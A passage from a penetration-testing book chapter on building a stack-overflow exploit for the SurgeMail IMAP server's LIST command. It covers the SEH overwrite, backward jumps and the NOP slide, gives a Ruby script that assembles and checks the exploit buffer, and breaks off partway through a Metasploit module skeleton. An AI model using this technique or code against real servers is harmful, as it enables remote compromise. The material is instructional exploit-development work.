Chapter 14

Hopping Around SEH Restrictions

Following the SEH overwrite, there's very little space for shellcode before the
end of the stack. Normally, a POP-POP-RETN sequence would be used to return into
the Next SEH (NSEH) record, which holds a short jump forward into the shellcode.
We'll overcome this limited space restriction by developing an exploit that uses
as much of the buffer as possible for our final payload. At this point, we are
done with the fuzzing process and we'll move into developing an exploit for the
vulnerability that we found.

This exploit would be a good candidate for an egg hunter, which is a small
segment of shellcode that searches memory for the main payload; however, we'll
use a different tactic and overwrite SEH with the address of a POP-POP-RETN
sequence. Once that's overwritten, the POP-POP-RETN returns into NSEH, where we
place a short jump backward (rather than forward) that needs only two bytes.
Next, we'll use the space gained by jumping backward to hold a larger near jump
that lands farther back, at the start of a NOP slide followed by the shellcode.
Although it's not required, a NOP slide is always a good addition to an
exploit, because it gives you a little room for error should the buffer
position change in memory. NOPs have no adverse impact on the exploit code and
act as filler. Conceptually, the attack will look like this:

[Buffer of garbage | NOP Slide | Shellcode | Near Jump | Short Jump | POP-POP-RETN]

To ensure portability of the exploit across different versions of Windows,
use a return address from an application DLL or executable rather than from a
system DLL, because system DLL addresses change between Windows versions and
service packs. In this case, only the application executable itself is
available. Because the executable is mapped at a low address, every address
inside it begins with a null byte, which would terminate the string we send;
instead, you can try to overwrite only the low three bytes of the SEH handler
with the address of a POP-POP-RETN sequence from the surgemail.exe file,
leaving the null high byte that is already on the stack untouched. If this can
be done successfully, the exploit will be universal across versions of Windows.
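As an added example (not code from the book or from the Metasploit module it goes on to build), the Ruby below assembles the layout sketched above and checks the jump arithmetic, including the three-byte SEH overwrite. The junk length, NOP count, stand-in shellcode and POP-POP-RETN address are all hypothetical values chosen for the demonstration; in a real exploit the offsets come from the fuzzing and debugging done earlier.

```ruby
# Added example, not from the book: build the
# [junk | NOP slide | shellcode | near jmp | short jmp | SEH] layout and
# verify that the two backward jumps land at the top of the NOP slide.

# x86 short jump (EB rel8): rel8 counts from the end of the 2-byte opcode.
def short_jmp(rel)
  raise ArgumentError, "rel8 out of range: #{rel}" unless (-128..127).cover?(rel)
  [0xEB, rel].pack('Cc')
end

# x86 near jump (E9 rel32): rel32 counts from the end of the 5-byte opcode.
def near_jmp(rel)
  [0xE9, rel].pack('Cl<')
end

# junk_len: filler before the slide (hypothetical; the real value is the
#           distance to NSEH that fuzzing established, minus what follows)
# nop_len:  size of the NOP slide
# ppr:      address of a POP-POP-RETN inside surgemail.exe (hypothetical value
#           here); only its low three bytes are sent, so the null high byte
#           already on the stack is left untouched
def build_seh_buffer(shellcode, junk_len:, nop_len:, ppr:)
  sc   = shellcode.b
  nops = [0x90].pack('C') * nop_len
  # The near jump ends exactly at NSEH, so reaching the top of the slide
  # means moving back over the slide, the shellcode and the jump itself.
  near_rel = -(nop_len + sc.bytesize + 5)
  # The short jump in NSEH ends at NSEH+2 and must land on the near jump,
  # which starts 5 bytes before NSEH: back 2 + 5 = 7 bytes.
  nseh = short_jmp(-7) + [0x90, 0x90].pack('CC')   # EB F9 90 90
  seh  = [ppr].pack('V')[0, 3]                     # 3-byte partial overwrite
  ('A' * junk_len) + nops + sc + near_jmp(near_rel) + nseh + seh
end

# Follow the hops the CPU takes after POP-POP-RETN returns into NSEH.
# Returns the buffer offset execution lands on, which should be the start
# of the NOP slide.
def trace_hops(buf)
  nseh = buf.bytesize - 3 - 4            # 3 bytes of SEH, 4 bytes of NSEH
  raise "no short jump at NSEH" unless buf.getbyte(nseh) == 0xEB
  pc = nseh + 2 + buf.byteslice(nseh + 1, 1).unpack1('c')
  raise "no near jump at offset #{pc}" unless buf.getbyte(pc) == 0xE9
  pc + 5 + buf.byteslice(pc + 1, 4).unpack1('l<')
end

if __FILE__ == $PROGRAM_NAME
  stub = [0xCC].pack('C') * 300   # constructed stand-in for real shellcode
  buf  = build_seh_buffer(stub, junk_len: 1000, nop_len: 32, ppr: 0x00401234)
  puts "buffer: #{buf.bytesize} bytes, lands at offset #{trace_hops(buf)}"
end
```

The short jump displacement is fixed at -7 because the near jump is always placed directly in front of NSEH; only the near jump's displacement depends on the payload size, which is why the layout works for any shellcode length without touching the two-byte hop.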

Let's move on to creating the actual exploit for the SurgeMail vulnerability.
Following is our initial skeleton exploit module to be saved in
/root/.msf3/modules/exploits/windows/imap/:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    # Mixin providing the IMAP connection and login helpers the module relies on
    include Msf::Exploit::Remote::Imap

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Surgemail 3.8k4-4 IMAPD LIST Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack overflow in the Surgemail IMAP Server
                version 3.8k4-4 by sending an overly long LIST command. Valid IMAP
                account credentials are required.
            },
            'Author'         => [ 'ryujin' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $',